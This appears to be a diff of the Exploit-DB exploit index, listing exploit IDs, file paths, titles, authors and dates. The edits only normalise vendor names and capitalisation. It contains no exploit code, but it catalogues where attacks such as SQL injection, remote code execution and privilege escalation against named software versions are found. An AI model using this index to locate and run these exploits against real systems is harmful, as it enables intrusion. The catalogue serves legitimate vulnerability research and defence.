35485,platforms/php/dos/35485.php,"PHP < 5.3.6 'Zip' Extension - 'zip_fread()' Function Denial of Service",2011-03-10,TorokAlpar,php,dos,0 35486,platforms/php/dos/35486.php,"PHP < 5.3.6 OpenSSL Extension - openssl_encrypt Function Plaintext Data Memory Leak Denial of Service",2011-03-08,dovbysh,php,dos,0 35487,platforms/php/dos/35487.php,"PHP < 5.3.6 OpenSSL Extension - openssl_decrypt Function Ciphertext Data Memory Leak Denial of Service",2011-03-08,dovbysh,php,dos,0 -35488,platforms/osx/local/35488.c,"Apple Mac OSX 10.6.x - HFS Subsystem Information Disclosure",2011-03-21,"Dan Rosenberg",osx,local,0 +35488,platforms/osx/local/35488.c,"Apple Mac OS X 10.6.x - HFS Subsystem Information Disclosure",2011-03-21,"Dan Rosenberg",osx,local,0 35489,platforms/multiple/dos/35489.pl,"Perl 5.x - 'Perl_reg_numbered_buff_fetch()' Function Remote Denial of Service",2011-03-23,"Vladimir Perepelitsa",multiple,dos,0 35490,platforms/php/webapps/35490.txt,"IceHrm 7.1 - Multiple Vulnerabilities",2014-12-08,LiquidWorm,php,webapps,0 35492,platforms/php/webapps/35492.txt,"Free Article Submissions 1.0 - SQL Injection",2014-12-08,BarrabravaZ,php,webapps,0 -35493,platforms/php/webapps/35493.txt,"Wordpress Ajax Store Locator 1.2 Plugin - Arbitrary File Download",2014-12-08,"Claudio Viviani",php,webapps,0 +35493,platforms/php/webapps/35493.txt,"WordPress Ajax Store Locator 1.2 Plugin - Arbitrary File Download",2014-12-08,"Claudio Viviani",php,webapps,0 35518,platforms/php/webapps/35518.txt,"OpenEMR 4.1.2(7) - Multiple SQL Injections",2014-12-10,Portcullis,php,webapps,80 -35495,platforms/multiple/remote/35495.txt,"Advantech/BroadWin SCADA WebAccess 7.0 - Multiple Remote Security Vulnerabilities",2011-03-23,"Ruben Santamarta ",multiple,remote,0 +35495,platforms/multiple/remote/35495.txt,"Advantech/BroadWin SCADA Webaccess 7.0 - Multiple Remote Security Vulnerabilities",2011-03-23,"Ruben Santamarta ",multiple,remote,0 35496,platforms/php/webapps/35496.txt,"MC Content Manager 10.1.1 - Multiple Cross-Site Scripting Vulnerabilities",2011-03-24,MustLive,php,webapps,0 35497,platforms/php/webapps/35497.txt,"GrapeCity Data Dynamics Reports 1.6.2084.14 - Multiple Cross-Site Scripting Vulnerabilities",2011-03-24,Dionach,php,webapps,0 35498,platforms/php/webapps/35498.txt,"Ripe Website Manager 1.1 - Cross-Site Scripting / Multiple SQL Injection",2011-03-24,"High-Tech Bridge SA",php,webapps,0 @@ -31993,17 +31996,17 @@ id,file,description,date,author,platform,type,port 35502,platforms/windows/dos/35502.pl,"eXPert PDF Batch Creator 7.0.880.0 - Denial of Service",2011-03-27,KedAns-Dz,windows,dos,0 35503,platforms/windows/local/35503.rb,"Advantech AdamView 4.30.003 - '.gni' SEH Buffer Overflow",2014-12-09,"Muhamad Fadzil Ramli",windows,local,0 35672,platforms/jsp/webapps/35672.txt,"Cisco Unified Communications Manager 8.5 - 'xmldirectorylist.jsp' Multiple SQL Injection",2011-04-27,"Alberto Revelli",jsp,webapps,0 -35673,platforms/php/webapps/35673.txt,"Wordpress Daily Maui Photo Widget Plugin 0.2 - Multiple Cross-Site Scripting Vulnerabilities",2011-04-28,"High-Tech Bridge SA",php,webapps,0 -35674,platforms/php/webapps/35674.txt,"Wordpress WP Photo Album Plugin 1.5.1 - 'id' Parameter Cross-Site Scripting",2011-04-28,"High-Tech Bridge SA",php,webapps,0 +35673,platforms/php/webapps/35673.txt,"WordPress Daily Maui Photo Widget Plugin 0.2 - Multiple Cross-Site Scripting Vulnerabilities",2011-04-28,"High-Tech Bridge SA",php,webapps,0 +35674,platforms/php/webapps/35674.txt,"WordPress WP Photo Album Plugin 1.5.1 - 'id' Parameter Cross-Site Scripting",2011-04-28,"High-Tech Bridge SA",php,webapps,0 35675,platforms/php/webapps/35675.txt,"Kusaba X 0.9 - Multiple Cross-Site Scripting Vulnerabilities",2011-04-27,"Emilio Pinna",php,webapps,0 35676,platforms/cgi/webapps/35676.txt,"BackupPC 3.x - 'index.cgi' Multiple Cross-Site Scripting Vulnerabilities",2011-04-28,"High-Tech Bridge SA",cgi,webapps,0 -35505,platforms/php/webapps/35505.txt,"Wordpress Plugin Symposium 14.10 - SQL Injection",2014-12-09,"Kacper Szurek",php,webapps,0 +35505,platforms/php/webapps/35505.txt,"WordPress Plugin Symposium 14.10 - SQL Injection",2014-12-09,"Kacper Szurek",php,webapps,0 35506,platforms/php/webapps/35506.pl,"Flat Calendar 1.1 - HTML Injection",2014-12-09,"ZoRLu Bugrahan",php,webapps,0 35507,platforms/windows/dos/35507.pl,"DivX Player 7 - Multiple Remote Buffer Overflow Vulnerabilities",2011-03-27,KedAns-Dz,windows,dos,0 35508,platforms/php/webapps/35508.txt,"Cetera eCommerce - Multiple Cross-Site Scripting / SQL Injection",2011-03-27,MustLive,php,webapps,0 35509,platforms/windows/remote/35509.pl,"FLVPlayer4Free 2.9 - '.fp4f' Remote Buffer Overflow",2011-03-27,KedAns-Dz,windows,remote,0 35510,platforms/php/webapps/35510.txt,"Humhub 0.10.0-rc.1 - SQL Injection",2014-12-10,"Jos Wetzels, Emiel Florijn",php,webapps,0 -35511,platforms/php/webapps/35511.txt,"Humhub 0.10.0-rc.1 - Multiple Persistent Cross-Site Scripting vulnerabilities",2014-12-10,"Jos Wetzels, Emiel Florijn",php,webapps,0 +35511,platforms/php/webapps/35511.txt,"Humhub 0.10.0-rc.1 - Multiple Persistent Cross-Site Scripting Vulnerabilities",2014-12-10,"Jos Wetzels, Emiel Florijn",php,webapps,0 35558,platforms/php/webapps/35558.txt,"PHP-Fusion - 'articles.php' Cross-Site Scripting",2011-04-02,KedAns-Dz,php,webapps,0 35559,platforms/php/webapps/35559.txt,"MyBB 1.4/1.6 - Multiple Security Vulnerabilities",2011-04-04,MustLive,php,webapps,0 35513,platforms/linux/remote/35513.py,"Apache James Server 2.3.2 - Remote Command Execution",2014-12-10,"Jakub Palaczynski",linux,remote,4555 @@ -32025,17 +32028,17 @@ id,file,description,date,author,platform,type,port 35530,platforms/windows/dos/35530.py,"Mediacoder 0.8.33 build 5680 - '.m3u' SEH Buffer Overflow Denial of Service",2014-12-15,s-dz,windows,dos,0 35531,platforms/windows/dos/35531.py,"Mediacoder 0.8.33 build 5680 - SEH Buffer Overflow Denial of Service (.lst)",2014-12-15,s-dz,windows,dos,0 35532,platforms/windows/dos/35532.py,"jaangle 0.98i.977 - Denial of Service",2014-12-15,s-dz,windows,dos,0 -35533,platforms/php/webapps/35533.py,"Wordpress Download Manager 2.7.4 - Remote Code Execution",2014-12-15,"Claudio Viviani",php,webapps,0 +35533,platforms/php/webapps/35533.py,"WordPress Download Manager 2.7.4 - Remote Code Execution",2014-12-15,"Claudio Viviani",php,webapps,0 35548,platforms/php/webapps/35548.txt,"InTerra Blog Machine 1.84 - 'subject' Parameter HTML Injection",2011-03-31,"High-Tech Bridge SA",php,webapps,0 35535,platforms/php/webapps/35535.php,"PHPads 213607 - Authentication Bypass / Password Change Exploit",2014-12-15,"Shaker msallm",php,webapps,0 35539,platforms/php/dos/35539.txt,"phpMyAdmin 4.0.x / 4.1.x / 4.2.x - Denial of Service",2014-12-15,"Javer Nieto and Andres Rojas",php,dos,0 35560,platforms/windows/remote/35560.txt,"RealNetworks GameHouse 'InstallerDlg.dll' 2.6.0.445 ActiveX Control - Multiple Vulnerabilities",2011-04-03,rgod,windows,remote,0 35561,platforms/php/webapps/35561.txt,"WPwizz AdWizz Plugin 1.0 - 'link' Parameter Cross-Site Scripting",2011-04-04,"John Leitch",php,webapps,0 -35562,platforms/php/webapps/35562.txt,"Placester Wordpress Plugin 0.1 - 'ajax_action' Parameter Cross-Site Scripting",2011-04-03,"John Leitch",php,webapps,0 +35562,platforms/php/webapps/35562.txt,"Placester WordPress Plugin 0.1 - 'ajax_action' Parameter Cross-Site Scripting",2011-04-03,"John Leitch",php,webapps,0 35563,platforms/windows/remote/35563.pl,"EasyPHP 5.3.5.0 - 'index.php' Arbitrary File Download",2011-04-03,KedAns-Dz,windows,remote,0 35541,platforms/php/webapps/35541.txt,"ResourceSpace 6.4.5976 - Cross-Site Scripting / SQL Injection / Insecure Cookie Handling",2014-12-15,"Adler Freiheit",php,webapps,0 35556,platforms/hardware/webapps/35556.txt,"CIK Telecom VoIP router SVG6000RW - Privilege Escalation / Command Execution",2014-12-17,Chako,hardware,webapps,0 -35543,platforms/php/webapps/35543.txt,"Wordpress Wp Symposium 14.11 Plugin - Unauthenticated Arbitrary File Upload",2014-12-15,"Claudio Viviani",php,webapps,0 +35543,platforms/php/webapps/35543.txt,"WordPress Wp Symposium 14.11 Plugin - Unauthenticated Arbitrary File Upload",2014-12-15,"Claudio Viviani",php,webapps,0 35549,platforms/unix/remote/35549.rb,"ActualAnalyzer - 'ant' Cookie Command Execution",2014-12-16,Metasploit,unix,remote,80 35545,platforms/php/remote/35545.rb,"Tuleap - PHP Unserialize Code Execution",2014-12-15,Metasploit,php,remote,80 35547,platforms/php/webapps/35547.txt,"ICJobSite 1.1 - 'pid' Parameter SQL Injection",2011-03-30,RoAd_KiLlEr,php,webapps,0 @@ -32043,7 +32046,7 @@ id,file,description,date,author,platform,type,port 35551,platforms/php/webapps/35551.txt,"CMS Papoo 6.0.0 Rev. 4701 - Persistent Cross-Site Scripting",2014-12-16,"Steffen Rösemann",php,webapps,80 35552,platforms/windows/dos/35552.py,"MoviePlay 4.82 - '.avi' Buffer Overflow",2011-03-31,^Xecuti0N3r,windows,dos,0 35553,platforms/windows/dos/35553.pl,"Microsoft Windows Media Player 11.0.5721.5145 - '.avi' Buffer Overflow",2011-03-31,^Xecuti0N3r,windows,dos,0 -35554,platforms/linux/remote/35554.txt,"Perl 5.x - 'lc()' and 'uc()' Functions TAINT Mode Protection Security Bypass",2011-03-30,mmartinec,linux,remote,0 +35554,platforms/linux/remote/35554.txt,"Perl 5.x - 'lc()' and 'uc()' functions TAINT Mode Protection Security Bypass",2011-03-30,mmartinec,linux,remote,0 35555,platforms/php/webapps/35555.txt,"AWCM 2.x - 'search.php' Cross-Site Scripting",2011-04-01,"Antu Sanadi",php,webapps,0 35569,platforms/php/webapps/35569.txt,"XOOPS 2.5 - 'banners.php' Multiple Local File Inclusion",2011-04-04,KedAns-Dz,php,webapps,0 35570,platforms/multiple/remote/35570.txt,"python-feedparser 5.0 - 'feedparser/feedparser.py' Cross-Site Scripting",2011-04-05,fazalmajid,multiple,remote,0 @@ -32067,23 +32070,23 @@ id,file,description,date,author,platform,type,port 35588,platforms/php/remote/35588.rb,"Lotus Mail Encryption Server (Protector for Mail) - Local File Inclusion to Remote Code Execution (Metasploit)",2014-12-22,"Patrick Webster",php,remote,9000 35589,platforms/windows/dos/35589.py,"Notepad++ 6.6.9 - Buffer Overflow",2014-12-22,TaurusOmar,windows,dos,0 35590,platforms/windows/local/35590.txt,"BitRaider Streaming Client 1.3.3.4098 - Privilege Escalation",2014-12-23,LiquidWorm,windows,local,0 -35591,platforms/php/webapps/35591.txt,"PHPMyRecipes 1.2.2 - (browse.php category parameter) SQL Injection",2014-12-23,"Manish Tanwar",php,webapps,80 +35591,platforms/php/webapps/35591.txt,"PHPMyRecipes 1.2.2 - (browse.php category Parameter) SQL Injection",2014-12-23,"Manish Tanwar",php,webapps,80 35593,platforms/windows/webapps/35593.txt,"SysAid Server - Arbitrary File Disclosure",2014-12-23,"Bernhard Mueller",windows,webapps,0 35594,platforms/jsp/webapps/35594.txt,"NetIQ Access Manager 4.0 SP1 - Multiple Vulnerabilities",2014-12-23,"SEC Consult",jsp,webapps,8443 35595,platforms/linux/local/35595.txt,"GParted 0.14.1 - OS Command Execution",2014-12-23,"SEC Consult",linux,local,0 35596,platforms/php/webapps/35596.txt,"eGroupWare 1.8.1 - 'test.php' Cross-Site Scripting",2011-04-07,"AutoSec Tools",php,webapps,0 -35597,platforms/hardware/remote/35597.txt,"Fiberhome HG-110 - Cross-Site Scripting / Directory Traversal",2011-04-08,Zerial,hardware,remote,0 +35597,platforms/hardware/remote/35597.txt,"FiberHome HG-110 - Cross-Site Scripting / Directory Traversal",2011-04-08,Zerial,hardware,remote,0 35598,platforms/php/webapps/35598.txt,"1024 CMS 1.1.0 Beta - Multiple Input Validation Vulnerabilities",2011-04-08,"QSecure and Demetris Papapetrou",php,webapps,0 35599,platforms/asp/webapps/35599.txt,"Dimac CMS 1.3 XS - 'default.asp' SQL Injection",2011-04-11,KedAns-Dz,asp,webapps,0 -35600,platforms/linux/dos/35600.c,"Linux Kernel 2.6.x - 'inotify_init1()' Double Free Local Denial of Service",2011-04-11,anonymous,linux,dos,0 +35600,platforms/linux/dos/35600.c,"Linux Kernel 2.6.x - 'inotify_init1()' Double-Free Local Denial of Service",2011-04-11,anonymous,linux,dos,0 35601,platforms/php/webapps/35601.txt,"Etki Video PRO 2.0 - izle.asp id Parameter SQL Injection",2011-04-11,Kurd-Team,php,webapps,0 35602,platforms/php/webapps/35602.txt,"Etki Video PRO 2.0 - kategori.asp cat Parameter SQL Injection",2011-04-11,Kurd-Team,php,webapps,0 -35603,platforms/php/webapps/35603.txt,"Wordpress Live Wire 2.3.1 Theme - Multiple Security Vulnerabilities",2011-04-11,MustLive,php,webapps,0 +35603,platforms/php/webapps/35603.txt,"WordPress Live Wire 2.3.1 Theme - Multiple Security Vulnerabilities",2011-04-11,MustLive,php,webapps,0 35604,platforms/php/webapps/35604.txt,"eForum 1.1 - '/eforum.php' Arbitrary File Upload",2011-04-09,QSecure,php,webapps,0 -35605,platforms/php/webapps/35605.txt,"Lazarus GuestBook 1.22 - Multiple Vulnerabilities",2014-12-24,TaurusOmar,php,webapps,80 +35605,platforms/php/webapps/35605.txt,"Lazarus Guestbook 1.22 - Multiple Vulnerabilities",2014-12-24,TaurusOmar,php,webapps,80 35606,platforms/linux/remote/35606.txt,"MIT Kerberos 5 - kadmind Change Password Feature Remote Code Execution",2011-04-11,"Felipe Ortega",linux,remote,0 -35607,platforms/php/webapps/35607.txt,"Spellchecker Plugin 3.1 for Wordpress - 'general.php' Local File Inclusion / Remote File Inclusion",2011-04-12,"Dr Trojan",php,webapps,0 -35608,platforms/php/webapps/35608.txt,"Wordpress The Gazette Edition 2.9.4 Theme - Multiple Security Vulnerabilities",2011-04-12,MustLive,php,webapps,0 +35607,platforms/php/webapps/35607.txt,"Spellchecker Plugin 3.1 for WordPress - 'general.php' Local File Inclusion / Remote File Inclusion",2011-04-12,"Dr Trojan",php,webapps,0 +35608,platforms/php/webapps/35608.txt,"WordPress The Gazette Edition 2.9.4 Theme - Multiple Security Vulnerabilities",2011-04-12,MustLive,php,webapps,0 35609,platforms/php/webapps/35609.txt,"WebCalendar 1.2.3 - Multiple Cross-Site Scripting Vulnerabilities (1)",2011-04-12,"High-Tech Bridge SA",php,webapps,0 35610,platforms/php/webapps/35610.txt,"Plogger 1.0 RC1 - 'gallery_name' Parameter Cross-Site Scripting",2011-04-12,"High-Tech Bridge SA",php,webapps,0 35611,platforms/php/webapps/35611.txt,"Website Baker 2.8.1 - Multiple SQL Injections",2011-04-12,"High-Tech Bridge SA",php,webapps,0 @@ -32100,14 +32103,14 @@ id,file,description,date,author,platform,type,port 35622,platforms/windows/dos/35622.txt,"Wickr Desktop 2.2.1 Windows - Denial of Service",2014-12-27,Vulnerability-Lab,windows,dos,0 35623,platforms/multiple/webapps/35623.txt,"Pimcore 3.0 / 2.3.0 CMS - SQL Injection",2014-12-27,Vulnerability-Lab,multiple,webapps,0 35624,platforms/php/webapps/35624.txt,"phpList 3.0.6 / 3.0.10 - SQL Injection",2014-12-27,Vulnerability-Lab,php,webapps,0 -35625,platforms/php/webapps/35625.txt,"PMB 4.1.3 - Post-Authenticated SQL Injection",2014-12-27,"xd4rker dark",php,webapps,0 -35626,platforms/php/webapps/35626.txt,"Easy File Sharing Webserver 6.8 - Persistent Cross-Site Scripting",2014-12-27,"Sick Psycko",php,webapps,0 +35625,platforms/php/webapps/35625.txt,"PMB 4.1.3 - Post-Authentication SQL Injection",2014-12-27,"xd4rker dark",php,webapps,0 +35626,platforms/php/webapps/35626.txt,"Easy File Sharing WebServer 6.8 - Persistent Cross-Site Scripting",2014-12-27,"Sick Psycko",php,webapps,0 35629,platforms/php/webapps/35629.txt,"ChillyCMS 1.2.1 - Multiple Remote File Inclusion",2011-04-16,KedAns-Dz,php,webapps,0 35630,platforms/php/webapps/35630.txt,"Joomla Component - 'com_phocadownload' Local File Inclusion",2011-04-18,KedAns-Dz,php,webapps,0 35631,platforms/php/webapps/35631.txt,"CRESUS - 'recette_detail.php' SQL Injection",2011-04-19,"GrayHatz Security Group",php,webapps,0 35632,platforms/php/webapps/35632.txt,"XOOPS 2.5 - 'imagemanager.php' Local File Inclusion",2011-04-18,KedAns-Dz,php,webapps,0 35633,platforms/php/webapps/35633.txt,"Ultra Marketing Enterprises CMS and Cart - Multiple SQL Injections",2011-04-19,eXeSoul,php,webapps,0 -35634,platforms/php/webapps/35634.txt,"Wordpress WP-StarsRateBox Plugin 1.1 - 'j' Parameter SQL Injection",2011-04-19,"High-Tech Bridge SA",php,webapps,0 +35634,platforms/php/webapps/35634.txt,"WordPress WP-StarsRateBox Plugin 1.1 - 'j' Parameter SQL Injection",2011-04-19,"High-Tech Bridge SA",php,webapps,0 35635,platforms/php/webapps/35635.txt,"Dalbum 1.43 - 'editini.php' Cross-Site Scripting",2011-04-19,"High-Tech Bridge SA",php,webapps,0 35636,platforms/php/webapps/35636.txt,"ChatLakTurk PHP Botlu Video - 'ara.php' Cross-Site Scripting",2011-04-19,"kurdish hackers team",php,webapps,0 35637,platforms/android/remote/35637.py,"WhatsApp 2.11.476 - Remote Reboot/Crash App Android",2014-12-28,"Daniel Godoy",android,remote,0 @@ -32125,17 +32128,17 @@ id,file,description,date,author,platform,type,port 35649,platforms/php/webapps/35649.txt,"todoyu 2.0.8 - 'lang' Parameter Cross-Site Scripting",2011-04-22,"AutoSec Tools",php,webapps,0 35650,platforms/php/webapps/35650.py,"LightNEasy 3.2.3 - 'userhandle' Cookie Parameter SQL Injection",2011-04-21,"AutoSec Tools",php,webapps,0 35651,platforms/php/webapps/35651.txt,"Dolibarr 3.0 - Local File Inclusion / Cross-Site Scripting",2011-04-22,"AutoSec Tools",php,webapps,0 -35652,platforms/windows/remote/35652.sh,"Liferay Portal 7.0.0 M1/7.0.0 M2/7.0.0 M3 - Pre-Authenticated Remote Code Execution",2014-12-30,drone,windows,remote,0 -35657,platforms/php/webapps/35657.php,"Sermon Browser Wordpress Plugin 0.43 - Cross-Site Scripting / SQL Injection",2011-04-26,Ma3sTr0-Dz,php,webapps,0 +35652,platforms/windows/remote/35652.sh,"Liferay Portal 7.0.0 M1/7.0.0 M2/7.0.0 M3 - Pre-Authentication Remote Code Execution",2014-12-30,drone,windows,remote,0 +35657,platforms/php/webapps/35657.php,"Sermon Browser WordPress Plugin 0.43 - Cross-Site Scripting / SQL Injection",2011-04-26,Ma3sTr0-Dz,php,webapps,0 35655,platforms/php/webapps/35655.txt,"TemaTres 1.3 - '_search_expresion' Parameter Cross-Site Scripting",2011-04-25,"AutoSec Tools",php,webapps,0 35656,platforms/windows/dos/35656.pl,"eXPert PDF 7.0.880.0 - '.pj' Heap Based Buffer Overflow",2011-04-25,KedAns-Dz,windows,dos,0 35662,platforms/php/webapps/35662.txt,"Noah's Classifieds 5.0.4 - 'index.php' Multiple HTML Injection Vulnerabilities",2011-04-26,"High-Tech Bridge SA",php,webapps,0 35664,platforms/php/webapps/35664.txt,"phpList 2.10.x - 'email' Parameter Cross-Site Scripting",2011-04-26,"High-Tech Bridge SA",php,webapps,0 35658,platforms/php/webapps/35658.txt,"html-edit CMS 3.1.x - 'html_output' Parameter Cross-Site Scripting",2011-04-26,KedAns-Dz,php,webapps,0 35660,platforms/php/remote/35660.rb,"ProjectSend - Arbitrary File Upload",2014-12-31,Metasploit,php,remote,80 -35661,platforms/windows/local/35661.txt,"Windows 8.1 (32/64 bit) - (ahcache.sys/NtApphelpCacheControl) Privilege Escalation",2015-01-01,"Google Security Research",windows,local,0 +35661,platforms/windows/local/35661.txt,"Microsoft Windows 8.1 (32/64 bit) - (ahcache.sys/NtApphelpCacheControl) Privilege Escalation",2015-01-01,"Google Security Research",windows,local,0 35654,platforms/windows/dos/35654.py,"AT-TFTP Server 1.8 - 'Read' Request Remote Denial of Service",2011-04-25,"Antu Sanadi",windows,dos,0 -35663,platforms/php/webapps/35663.txt,"WP Ajax Recent Posts Wordpress Plugin 1.0.1 - 'do' Parameter Cross-Site Scripting",2011-04-26,"High-Tech Bridge SA",php,webapps,0 +35663,platforms/php/webapps/35663.txt,"WP Ajax Recent Posts WordPress Plugin 1.0.1 - 'do' Parameter Cross-Site Scripting",2011-04-26,"High-Tech Bridge SA",php,webapps,0 35653,platforms/php/webapps/35653.txt,"Nuke Evolution Xtreme 2.0 - Local File Inclusion / SQL Injection",2011-04-22,KedAns-Dz,php,webapps,0 35665,platforms/php/webapps/35665.txt,"PHP F1 Max's Photo Album - 'showimage.php' Cross-Site Scripting",2011-04-26,"High-Tech Bridge SA",php,webapps,0 35666,platforms/php/webapps/35666.txt,"Football Website Manager 1.1 - SQL Injection / Multiple HTML Injection Vulnerabilities",2011-04-26,RoAd_KiLlEr,php,webapps,0 @@ -32185,11 +32188,11 @@ id,file,description,date,author,platform,type,port 35723,platforms/php/webapps/35723.txt,"TCExam 11.1.29 - 'tce_xml_user_results.php' Multiple SQL Injection",2011-05-01,"AutoSec Tools",php,webapps,0 35724,platforms/php/webapps/35724.txt,"EmbryoCore 1.03 - 'index.php' SQL Injection",2011-05-09,KedAns-Dz,php,webapps,0 35725,platforms/multiple/dos/35725.pl,"Perl 5.10 - Multiple NULL Pointer Dereference Denial Of Service Vulnerabilities",2011-05-03,"Jonathan Brossard",multiple,dos,0 -35726,platforms/php/webapps/35726.py,"GetSimple 3.0 - 'set' Parameter Local File Inclusion",2011-05-07,"AutoSec Tools",php,webapps,0 +35726,platforms/php/webapps/35726.py,"Getsimple 3.0 - 'set' Parameter Local File Inclusion",2011-05-07,"AutoSec Tools",php,webapps,0 35727,platforms/php/webapps/35727.txt,"HOMEPIMA Design - 'filedown.php' Local File Disclosure",2011-05-09,KnocKout,php,webapps,0 35728,platforms/asp/webapps/35728.txt,"Keyfax Customer Response Management 3.2.2.6 - Multiple Cross-Site Scripting Vulnerabilities",2011-05-09,"Richard Brain",asp,webapps,0 35729,platforms/multiple/remote/35729.txt,"Imperva SecureSphere - SQL Query Filter Security Bypass",2011-05-09,@drk1wi,multiple,remote,0 -35730,platforms/php/webapps/35730.txt,"Wordpress Shopping Cart 3.0.4 Plugin - Unrestricted File Upload",2015-01-08,"Kacper Szurek",php,webapps,80 +35730,platforms/php/webapps/35730.txt,"WordPress Shopping Cart 3.0.4 Plugin - Unrestricted File Upload",2015-01-08,"Kacper Szurek",php,webapps,80 35731,platforms/php/remote/35731.rb,"Pandora 3.1 - Authentication Bypass / Arbitrary File Upload",2015-01-08,Metasploit,php,remote,80 35732,platforms/multiple/local/35732.py,"Ntpdc 4.2.6p3 - Local Buffer Overflow",2015-01-08,drone,multiple,local,0 35733,platforms/php/webapps/35733.txt,"vBulletin MicroCART 1.1.4 - Arbitrary File(s) Deletion / SQL Injection / Cross-Site Scripting",2015-01-09,Technidev,php,webapps,80 @@ -32201,7 +32204,7 @@ id,file,description,date,author,platform,type,port 35739,platforms/php/webapps/35739.txt,"Argyle Social - Multiple Cross-Site Scripting Vulnerabilities",2011-05-12,"High-Tech Bridge SA",php,webapps,0 35740,platforms/windows/remote/35740.txt,"Microsoft .NET Framework JIT Compiler - Optimization NULL String Remote Code Execution",2011-03-04,"Brian Mancini",windows,remote,0 35741,platforms/windows/local/35741.pl,"Palringo 2.8.1 - Stack Buffer Overflow (PoC)",2015-01-10,Mr.ALmfL9,windows,local,0 -35742,platforms/osx/local/35742.c,"OS X 10.9.x - sysmond XPC Privilege Escalation",2015-01-10,"Google Security Research",osx,local,0 +35742,platforms/osx/local/35742.c,"Apple Mac OS X 10.9.x - sysmond XPC Privilege Escalation",2015-01-10,"Google Security Research",osx,local,0 35743,platforms/multiple/webapps/35743.txt,"Flash Tag Cloud And MT-Cumulus Plugin - 'tagcloud' Parameter Cross-Site Scripting",2011-05-13,MustLive,multiple,webapps,0 35744,platforms/windows/remote/35744.pl,"AVS Ringtone Maker 1.6.1 - '.au' File Remote Buffer Overflow",2011-05-16,KedAns-Dz,windows,remote,0 35745,platforms/php/webapps/35745.txt,"Joomla! 'com_cbcontact' Component - 'contact_id' Parameter SQL Injection",2011-05-16,KedAns-Dz,php,webapps,0 @@ -32230,19 +32233,19 @@ id,file,description,date,author,platform,type,port 35998,platforms/php/webapps/35998.txt,"CobraScripts Trading Marketplace Script - 'cid' Parameter SQL Injection",2011-07-25,Ehsan_Hp200,php,webapps,0 35786,platforms/multiple/webapps/35786.txt,"Ansible Tower 2.0.2 - Multiple Vulnerabilities",2015-01-14,"SEC Consult",multiple,webapps,80 35770,platforms/hardware/webapps/35770.py,"Dell iDRAC IPMI 1.5 - Insufficient Session ID Randomness",2015-01-13,"Yong Chuan, Koh",hardware,webapps,623 -35771,platforms/osx/dos/35771.c,"OS X 10.10 Bluetooth DispatchHCICreateConnection - Crash (PoC)",2015-01-13,"rpaleari and joystick",osx,dos,0 -35772,platforms/osx/dos/35772.c,"OS X 10.10 Bluetooth BluetoothHCIChangeLocalName - Crash (PoC)",2015-01-13,"rpaleari and joystick",osx,dos,0 -35773,platforms/osx/dos/35773.c,"OS X 10.10 Bluetooth TransferACLPacketToHW - Crash (PoC)",2015-01-13,"rpaleari and joystick",osx,dos,0 -35774,platforms/osx/dos/35774.c,"OS X 10.10 Bluetooth DispatchHCIWriteStoredLinkKey - Crash (PoC)",2015-01-13,"rpaleari and joystick",osx,dos,0 +35771,platforms/osx/dos/35771.c,"Apple Mac OS X 10.10 - BlueTooth DispatchHCICreateConnection - Crash (PoC)",2015-01-13,"rpaleari and joystick",osx,dos,0 +35772,platforms/osx/dos/35772.c,"Apple Mac OS X 10.10 - BlueTooth BlueToothHCIChangeLocalName - Crash (PoC)",2015-01-13,"rpaleari and joystick",osx,dos,0 +35773,platforms/osx/dos/35773.c,"Apple Mac OS X 10.10 - BlueTooth TransferACLPacketToHW - Crash (PoC)",2015-01-13,"rpaleari and joystick",osx,dos,0 +35774,platforms/osx/dos/35774.c,"Apple Mac OS X 10.10 - BlueTooth DispatchHCIWriteStoredLinkKey - Crash (PoC)",2015-01-13,"rpaleari and joystick",osx,dos,0 35775,platforms/ios/webapps/35775.txt,"Foxit MobilePDF 4.4.0 iOS - Multiple Vulnerabilities",2015-01-13,Vulnerability-Lab,ios,webapps,8888 35776,platforms/java/remote/35776.rb,"Lexmark MarkVision Enterprise - Arbitrary File Upload",2015-01-13,Metasploit,java,remote,9788 35777,platforms/windows/remote/35777.rb,"Oracle MySQL for Microsoft Windows - FILE Privilege Abuse",2015-01-13,Metasploit,windows,remote,0 -35778,platforms/php/remote/35778.rb,"Wordpress WP Symposium 14.11 Plugin - Arbitrary File Upload",2015-01-13,Metasploit,php,remote,80 +35778,platforms/php/remote/35778.rb,"WordPress WP Symposium 14.11 Plugin - Arbitrary File Upload",2015-01-13,Metasploit,php,remote,80 35779,platforms/hardware/remote/35779.txt,"CiscoWorks Common Services Framework 3.1.1 Help Servlet - Cross-Site Scripting",2011-05-18,"Sense of Security",hardware,remote,0 35780,platforms/hardware/remote/35780.txt,"Cisco Unified Operations Manager 8.5 - Common Services Device Center Cross-Site Scripting",2011-05-18,"Sense of Security",hardware,remote,0 35781,platforms/java/webapps/35781.txt,"CiscoWorks Common Services 3.1.1 - Auditing Directory Traversal",2011-05-18,"Sense of Security",java,webapps,0 35782,platforms/php/webapps/35782.txt,"Room Juice 0.3.3 - 'display.php' Cross-Site Scripting",2011-05-19,"AutoSec Tools",php,webapps,0 -35783,platforms/php/webapps/35783.html,"Andy's PHP Knowledgebase 0.95.4 - 'step5.php' Remote PHP Code Execution",2011-05-19,"AutoSec Tools",php,webapps,0 +35783,platforms/php/webapps/35783.html,"Andy's PHP KnowledgeBase 0.95.4 - 'step5.php' Remote PHP Code Execution",2011-05-19,"AutoSec Tools",php,webapps,0 35784,platforms/linux/remote/35784.php,"Zend Framework 1.11.4 - 'PDO_MySql' Security Bypass",2011-05-19,"Anthony Ferrara",linux,remote,0 35785,platforms/linux/remote/35785.txt,"klibc 1.5.2 - DHCP Options Processing Remote Shell Command Execution",2011-05-18,"maximilian attems",linux,remote,0 35787,platforms/php/webapps/35787.txt,"LimeSurvey 1.85+ - 'admin.php' Cross-Site Scripting",2011-05-19,"Juan Manuel Garcia",php,webapps,0 @@ -32261,14 +32264,14 @@ id,file,description,date,author,platform,type,port 35799,platforms/linux/remote/35799.txt,"Vordel Gateway 6.0.3 - Directory Traversal",2011-05-25,"Brian W. Gary",linux,remote,0 35800,platforms/hardware/remote/35800.txt,"RXS-3211 IP Camera - UDP Packet Password Information Disclosure",2011-05-25,"Spare Clock Cycles",hardware,remote,0 35801,platforms/linux/remote/35801.txt,"Asterisk 1.8.4.1 - SIP 'REGISTER' Request User Enumeration",2011-05-26,"Francesco Tornieri",linux,remote,0 -35802,platforms/cgi/webapps/35802.txt,"Blackboard Learn 8.0 - 'keywordraw' Parameter Cross-Site Scripting",2011-05-25,"Matt Jezorek",cgi,webapps,0 +35802,platforms/cgi/webapps/35802.txt,"BlackBoard Learn 8.0 - 'keywordraw' Parameter Cross-Site Scripting",2011-05-25,"Matt Jezorek",cgi,webapps,0 